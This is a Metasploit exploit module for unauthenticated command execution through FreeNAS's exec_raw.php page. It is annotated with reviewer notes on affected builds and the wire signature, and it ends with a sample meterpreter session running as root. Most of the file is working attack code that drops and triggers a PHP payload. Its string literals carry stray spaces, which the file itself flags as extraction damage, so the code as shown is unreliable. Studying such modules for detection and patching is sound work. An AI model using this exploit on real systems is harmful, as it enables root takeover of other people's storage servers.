##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
# Metasploit remote exploit module for the FreeNAS exec_raw.php command
# execution flaw (OSVDB 94441).
#
# Reviewer notes, defender's view:
# * Affected builds: the module description names FreeNAS 0.7.2 before
#   revision 5543; the referenced release notes are those of 0.7.2.5543.
# * On the wire: a request to /exec_raw.php carrying a `cmd` query parameter
#   whose decoded value is a shell `echo ... > NAME.php` redirect, followed by
#   a request for that one-to-five letter, upper-case .php name.
# * This code attaches no credentials or session cookie to either request.
# * 'Privileged' is true, and the sample session at the end of the file shows
#   the resulting commands running as root.
#
# NOTE(review): the listing was recovered from a blame view that lost its
# indentation. String literals are reproduced exactly as they appear on the
# page; the extra spaces inside them look like extraction padding -- confirm
# against the upstream file before relying on any literal here.
class Metasploit3 < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::HttpClient

  # Registers the module metadata (name, references, payload limits, target)
  # with the framework.
  #
  # @param info [Hash] metadata supplied by the framework, merged through
  #   update_info with the values declared here
  def initialize(info = {})
    advisory_refs = [
      ['OSVDB', '94441'],
      ['URL', 'http://sourceforge.net/projects/freenas/files/stable/0.7.2/NOTES%200.7.2.5543.txt/download']
    ]

    # The payload travels inside a double-quoted shell `echo` argument in a
    # URL (see #exploit), which is presumably why quote characters, backtick,
    # '%' and '&' are listed as bad characters.
    payload_limits = {
      'Space' => 6144,
      'DisableNops' => true,
      'BadChars' => " ` \" ' %&x "
    }

    super(update_info(info,
      'Name' => 'FreeNAS exec_raw.php Arbitrary Command Execution',
      'Description' => %q{
        This module exploits an arbitrary command execution flaw
        in FreeNAS 0 . 7 . 2 < rev . 5543 . When passing a specially formatted URL
        to the exec_raw . php page , an attacker may be able to execute arbitrary
        commands .
        NOTE : This module works best with php / meterpreter payloads .
      },
      'Author' => ['MC'],
      'License' => MSF_LICENSE,
      'References' => advisory_refs,
      'Payload' => payload_limits,
      'Targets' => [
        ['Automatic Target', {}]
      ],
      'Privileged' => true,
      'Platform' => 'php',
      'Arch' => ARCH_PHP,
      'DisclosureDate' => 'Nov 6 2010',
      'DefaultTarget' => 0))
  end

  # Sends two requests: the first passes an `echo ... > <name>` command to
  # exec_raw.php so that a PHP file holding the encoded payload is written,
  # the second fetches that file. The name is one to five random upper-case
  # letters followed by the .php suffix.
  #
  # @return [nil] early, after logging an error, when the first request gets
  #   no response or a status other than 200; otherwise the value of `handler`
  def exploit
    dropped_page = "#{rand_text_alpha_upper(rand(5) + 1)} .php "
    php_body = payload.encoded
    write_cmd = " echo \" <?php \n #{php_body} \n ?> \" > #{dropped_page} "

    print_status(" Sending exploit page ' #{dropped_page} ' ")

    # The whole shell command is URL-encoded into the `cmd` parameter.
    write_request = {
      'uri' => " /exec_raw.php?cmd= #{Rex::Text.uri_encode(write_cmd)}"
    }
    res = send_request_raw(write_request, 10)

    unless res && res.code == 200
      print_error(" Exploit failed. ")
      return
    end

    print_status(" Triggering payload... ")
    send_request_raw({ 'uri' => " / #{dropped_page} " }, 5)
    handler
  end
end
=begin
meterpreter > sysinfo
Computer : freenas.local
OS : FreeBSD freenas.local 7.3-RELEASE-p2 FreeBSD 7.3-RELEASE-p2 #0: Sat Jul 31 12:22:04 CEST 2010 root@dev.freenas.org:/usr/obj/freenas/usr/src/sys/FREENAS-i386 i386
meterpreter > getuid
Server username : root (0)
meterpreter >
=end